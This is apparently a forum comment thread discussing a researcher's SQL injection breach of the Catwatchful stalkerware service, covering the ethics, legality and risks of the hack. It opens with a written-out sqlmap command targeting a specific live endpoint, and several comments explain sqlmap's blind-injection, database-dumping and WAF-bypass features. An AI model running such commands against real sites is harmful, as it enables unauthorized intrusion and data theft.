sqlmap https://catwatchful.pink/webservice/servicios.php?operation=getDevice&imei=M6GPYXHZ95ULUFD0
...
sqlmap identified the following injection points
>Intercepting my test phone’s traffic confirms that the files are directly uploaded to Firebase, and reveals that the commands for features like live photos are also handled through FCM. This is going to reduce our attack surface by a lot - nothing in Firebase is going to be IDORable or vulnerable to SQLI, and some quick testing eliminates any of the usual traps like open storage buckets or client-side service account credentials.
I was surprised at how the malware devs made such sloppy mistakes but being on Firebase protected them from more severe vulnerablities. I've seen other vendors get popped by configuring Firebase incorrectly, but it seems like if you configure the basics right, it cuts down the attack surface a lot.
The blog correctly explains how it has become pretty useless in our age where noone writes their own database integration anymore and everyone uses off-the-shelf components, but man... I remember a time when it felt like literally every sufficiently complex web service was vulnerable to sql injection. You could write a small wrapper for sqlmap, hook it up to the results of a scraper, let it run over night on every single piece of data sent to the server and the next day you'd have a bunch of entry points to choose from. It even handled WAFs to some degree. I'm out of it-sec for several years now, but I still remember every single command line argument for sqlmap like it was yesterday.
Chances are that these hackers are bypassing that filter without even realizing it.
I easily see people claiming they are the target of a foreign government because it gives them importance and it is less shameful than a spam botnet.
If there's one lesson I'd convey to people about security it is do not underestimate your foes. They've been building tools for decades just like any other discipline.
Tech to find a hole in your system that lets you run an arbitrary-but-constrained fragment of shell code that can put a small executable on to the system that puts a larger executable on that lifts itself up to root and also joins a centralized command-and-control server with the ability to push arbitrary code across entire clusters of owned systems is not some sort of bizarre, exotic technology that people only dream of... it's off-the-shelf tech. It's a basic building block. Actually sophisticated attackers build up from there.
If $YOU're operating on the presumption I see so often that the script kiddies blind-firing Wordpress vulnerabilities at servers is the height of attacker's sophistication $YOU are operating at an unrecoverable disadvantage against these people.
Even better, it knows how to exploit blind SQLi and has a number of tricks for doing so: it can often tell if a query is succeeding or failing based on HTTP error codes, and it will do things like try various SLEEP() injections to see if it can hang the server. If it finds any blind SQLi opportunities, it has the ability to dump the entire database *one bit at a time* by just doing a ton of requests in parallel.
You can actually hand it a file full of HTTP request headers and it'll automatically figure out where the potential injection points are, and send a bunch of requests formatted identically to the provided headers. You can practically automate SQL injection testing with a suitable MITM proxy and some scripting.
It has options for disguising requests, for bypassing WAFs, for submitting requests using custom protocols, and a ton more. Just a really well designed tool overall.
In many cases it's just not something that's taught at school or that is covered in training. So it's a mindset that just isn't there, even when they're great at other parts of the craft.
If you're building anything that is going to be exposed to the public Internet and you aren't, at some point, going through the exercise of "how can people break or abuse or hack this" then you're missing a step for sure.
> A: Yes, you can monitor a phone without them knowing with mobile phone monitoring software. The app is invisible and undetectable on the phone. It works in a hidden and stealth mode.
How is that even possible on a modern Android? I'd think one of the explicit goals of the security model would be to prevent this.
But as the TechCrunch author stated, oftentimes alerting the stalker can be dangerous for the victim.
> Google said it added new protections for Google Play Protect
But the screenshot of the device settings in the article shows that the app has you turn off Google Play Protect. So does this even do anything?
Meanwhile Google (via its firebase brand) is apparently continuing to act as a host for this app...
This doesn't sound like a satisfying step in debugging. On the other hand, confirms my appliance feelings.
> Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program"
I don't know the legal footing these spyware apps stand on, but this blog post seems like exhibit A if Catwatchful ever decided to sue the author, or press criminal charges. Hacking, even for reasons that seem morally justified, is still illegal.
But Daigle probably did consider being liable and what would be morally justified.
It must have been tempting to try to use the Catwatchful app to notify the victims that they are being stalked. E.g., by getting phone numbers or social media handles and then SMS/DM the victims (if the app reveals the victims handles in the recorded conversations)
Or getting the IMEI numbers and handing them over to network operators or local authorities who could do the notification.
It would probably help many victims, but it could go wrong in some cases.
Do you really think that the users of a stalker app care if the app got "hacked" once or twice? Do you also think that the app makers themselves really want to remind the legal world that this stuff is legal when i bet you >50% of their users probably installed it on devices that aren't theirs? IDK, personally I would avoid the law at all costs if I released something this shady.
The never disclosed to the target company (not that I think they should have), this is definitely not white hat. This is essentially the grey-hat version of vigilantism.
They disclosed it to a journalist and now on their blog.
They probably need to engage an attorney now.
However, next time he talks about emulating Nintendo games or whatever, I'm sure Nintendo lawyers would love to bring it up and point "how the defendant brazenly defies law and order with predetermination malice".
Not to begin to even mention now some shady criminal might hold a grudge against Daigle. I hope his security is air tight.
There is a reason these reports are usually anonymous or follow responsible disclosure.
This seems like a straw man, though? What if they just... continue to not do that? (I think this is what the other commenter meant with "concern trolling".)
> Not to begin to even mention now some shady criminal might hold a grudge against Daigle.
This is 1) not a problem a lawyer will help you with and 2) not a practical concern for most people in the US and Canada. For example, Brian Krebs continues to (read: he's not dead or otherwise intimidated into silence) put his name behind many similar reports of illegal activity. There is a reason law enforcement investigates and prosecutes violent crime.
I don't really see a practical reason for this person to avoid putting their name behind this report. The only reason that seems to make sense is if this group is not a criminal enterprise. Then they might be at all inclined to file a lawsuit.
Brian Krebs invests a huge amount into keeping his home address a secret and has extensive surveillance at his home to keep intruders out. He was once SWATed and another time someone ordered heroin to his home and called the police to frame him for drug trafficking.[0]
It's a bit of a miracle that Krebs continues his reporting. Krebs' courage and opsec is not very easy to achieve, especially for a 23 year old blogger like OP.
I agree that he’s courageous but only because he receives many threats, not because he faces imminent dangers. His protection comes from the fact that a criminal enterprise will only bring attention to themselves by purchasing his murder, which is true because law enforcement investigates and prosecutes violent crime.
The article says that he moved to a new home because of these incidents and now takes extreme measures to keep his address a secret.
I don't understand how you can make the argument that retribution from criminals is "not a practical concern" because Krebs still does his reporting in spite of the risks. SWATing and attempts to frame him for a serious crime aren't just threats - they occurred. He could have died or been imprisoned.
Are there documented cases of botnet owners trying to sue or get law enforcement to prosecute someone for infiltrating their botnet?
I'd be more concerned about extralegal retaliation from people in the malware ecosystem.
Stranger things have won in court
Without hard proof that the author did what they said they did, you have no real case. This particular story already sounds far fetched but makes good fantasy.
https://techcrunch.com/2025/07/02/data-breach-reveals-catwat...
People will continue doing their unethical behaviour not because we aren't on the streets fighting for the right thing, but because we just don't care enough, and let them continue.
Oh dear.